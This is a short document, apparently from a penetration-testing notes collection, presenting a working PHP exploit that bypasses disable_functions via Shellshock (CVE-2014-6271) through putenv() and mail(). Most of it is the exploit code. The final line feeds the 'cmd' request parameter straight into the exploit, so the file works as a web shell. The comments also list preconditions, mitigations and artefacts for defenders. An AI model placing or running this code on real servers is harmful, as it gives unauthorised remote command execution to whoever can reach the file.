# disable\_functions - PHP 5.x Shellshock Exploit
## PHP 5.x Shellshock Exploit
From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
```php
<?php
// Report the active disable_functions setting. The function defined below
// calls none of the usual command-execution functions; it relies only on
// putenv() and mail(), so a list that omits those two does not stop it.
echo "Disabled functions: ", ini_get('disable_functions'), "\n";
/**
 * Proof of concept for CVE-2014-6271 (Shellshock) reached through mail();
 * the original author locates the relevant call at mail.c:283.
 *
 * The command text is placed in an environment variable whose value starts
 * with a bash function definition, then mail() is called. If the shell that
 * mail() ends up spawning is an unpatched bash, it runs the text that
 * follows the definition; output is redirected to a temporary file and read
 * back from there.
 *
 * Defensive notes: the technique needs all of (1) /bin/sh resolving to a
 * bash that is still vulnerable to CVE-2014-6271, (2) putenv() being
 * callable and (3) mail() being callable. Patching bash, or listing putenv
 * and mail in disable_functions, breaks it. Artefacts worth hunting for are
 * environment values beginning with "() {" and short-lived files prefixed
 * "data" in the script's working directory.
 *
 * @param string $cmd Command text; interpolated into the environment value without escaping.
 * @return string The captured output, or one of two fixed status messages.
 */
function shellshock($cmd)
{
    // Only proceed when /bin/sh is a symlink whose target name contains
    // "bash"; readlink() yields false for a non-symlink, which also lands here.
    if (strstr(readlink("/bin/sh"), "bash") == FALSE) {
        return "Not vuln (not bash)";
    }

    // Unique file in the current directory (prefix "data") that receives the
    // redirected stdout and stderr.
    $tmp = tempnam(".", "data");

    // The variable name starts with PHP_ on purpose. Under Safe Mode the
    // safe_mode_allowed_env_vars directive restricts putenv() to names with
    // the listed prefixes, and its default is "PHP_" (e.g. PHP_FOO=BAR).
    // When that directive is empty, PHP lets a script set ANY variable.
    putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");

    // -bv asks the mailer to verify the address only, so no mail is sent;
    // the call matters solely because it starts the external mailer.
    mail("a@127.0.0.1", "", "", "", "-bv");

    // Errors are suppressed: a missing or unreadable file gives false, which
    // compares equal to "" below and produces the fallback message.
    $captured = @file_get_contents($tmp);
    @unlink($tmp);

    return ($captured != "") ? $captured : "No output, or not vuln.";
}
// The "cmd" request parameter (GET, POST or cookie, via $_REQUEST) reaches
// shellshock() with no validation or authentication, so a file containing
// this line under a web root should be treated as a web shell during triage.
print(shellshock($_REQUEST["cmd"]));
?>
```